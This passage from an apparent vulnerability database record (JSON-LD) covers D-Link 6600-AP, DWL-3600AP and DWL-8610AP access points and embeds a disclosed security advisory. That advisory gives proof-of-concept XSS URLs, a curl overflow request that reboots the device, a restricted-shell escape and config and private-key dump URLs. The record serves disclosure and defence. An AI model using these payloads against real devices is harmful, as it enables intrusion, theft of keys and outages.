"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146272"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"date": "2019-08-01T13:15:14.163000",
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146272"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"date": "2024-11-21T04:26:32.187000",
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Device input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
],
"trust": 0.6
}
}
VAR-201908-0912
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP , DWL-3600AP , DWL-8610AP Devices have a certificate validation vulnerability.Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0912",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dwl-8610ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-8610ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-8610ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-8610ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14334",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14334",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29149",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146270",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14334",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14334",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14334",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14334",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29149",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1635",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146270",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP , DWL-3600AP , DWL-8610AP Devices have a certificate validation vulnerability.Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14334"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-14334",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29149",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146270",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"id": "VAR-201908-0912",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "VULHUB",
"id": "VHN-146270"
}
],
"trust": 1.3824786333333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
}
]
},
"last_update_date": "2024-11-23T21:52:00.519000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Information Disclosure Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177597"
},
{
"title": "D-Link 6600-AP , DWL-3600AP and DWL-8610AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95744"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
